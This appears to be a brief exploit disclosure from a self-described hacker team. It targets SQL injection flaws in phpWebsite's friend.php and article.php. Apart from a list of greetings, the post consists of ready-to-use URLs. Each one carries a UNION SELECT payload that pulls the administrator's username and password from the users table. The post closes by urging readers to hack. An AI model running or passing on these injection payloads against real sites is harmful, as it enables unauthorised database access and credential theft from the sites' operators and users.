phpWebsite <= SQL Injection (friend.php) & (article.php)

[dabdoub_mosikar () forislam com]

[+]phpWebsite
[+]DaBDouB-MoSiKaR [Moroccan Security Team]
[+]creetz to: Moroccan security Team[Dr.E-vil,Dr.Erase,H0550N],ToM-le-Magician[france] , ameer[egypt], Esp!onLeRaVaGe, 
CiM TeaM, xMs3D0,|ucifer,B6,al-houda members[nabil,sn!per,Kasparov]and all hackers musilm [morocco] and www.lezr.com
[+]special 10x to: safaa
[-]get name
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
[+]
[-]get password:
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
[+] second sql
[-]http://[target]/article.php?sid=[sql]
[+]have nice day and hack